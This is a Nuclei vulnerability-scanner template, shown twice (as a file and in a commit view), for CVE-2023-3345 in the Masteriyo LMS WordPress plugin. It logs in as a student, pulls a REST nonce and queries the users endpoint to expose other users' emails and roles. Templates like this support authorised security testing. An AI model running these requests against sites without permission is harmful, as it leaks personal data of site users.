nuclei-templates/http/cves/2023/CVE-2023-3345.yaml

id: CVE-2023-3345

info:
  name: LMS by Masteriyo < 1.6.8 - Information Exposure
  author: DhiyaneshDK
  severity: medium
  description: |
    The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.
  reference:
    - https://wpscan.com/vulnerability/0d07423e-98d2-43a3-824d-562747a3d65a
    - https://github.com/RandomRobbieBF/learning-management-system
    - https://wordpress.org/plugins/learning-management-system
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3345
  metadata:
    max-request: 2
    verified: true
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
  tags: wp-plugin,xss,wp,wordpress,authenticated,learning-management-system,wpscan

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /wp-json/masteriyo/v1/users/ HTTP/1.1
        Host: {{Hostname}}
        X-WP-Nonce: {{nonce}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '"username":'
          - '"email":'
          - '"roles":'
        condition: and

      - type: word
        part: header_3
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)","versionString'
        internal: true
Create CVE-2023-3345.yaml 2023-07-15 12:32:13 +00:00			`id: CVE-2023-3345`

			`info:`
			`name: LMS by Masteriyo < 1.6.8 - Information Exposure`
			`author: DhiyaneshDK`
			`severity: medium`
			`description: \|`
			`The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.`
			`reference:`
			`- https://wpscan.com/vulnerability/0d07423e-98d2-43a3-824d-562747a3d65a`
			`- https://github.com/RandomRobbieBF/learning-management-system`
			`- https://wordpress.org/plugins/learning-management-system`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-3345`
			`metadata:`
			`max-request: 2`
			`verified: true`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 6.5`
			`tags: wp-plugin,xss,wp,wordpress,authenticated,learning-management-system,wpscan`

			`http:`
			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Origin: {{RootURL}}`
			`Content-Type: application/x-www-form-urlencoded`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1`

			`- \|`
			`GET /wp-admin/profile.php HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`GET /wp-json/masteriyo/v1/users/ HTTP/1.1`
			`Host: {{Hostname}}`
			`X-WP-Nonce: {{nonce}}`

			`cookie-reuse: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_3`
			`words:`
			`- '"username":'`
			`- '"email":'`
			`- '"roles":'`
			`condition: and`

			`- type: word`
			`part: header_3`
			`words:`
			`- application/json`

			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`name: nonce`
			`part: body`
			`group: 1`
			`regex:`
			`- '"nonce":"([a-z0-9]+)","versionString'`
			`internal: true`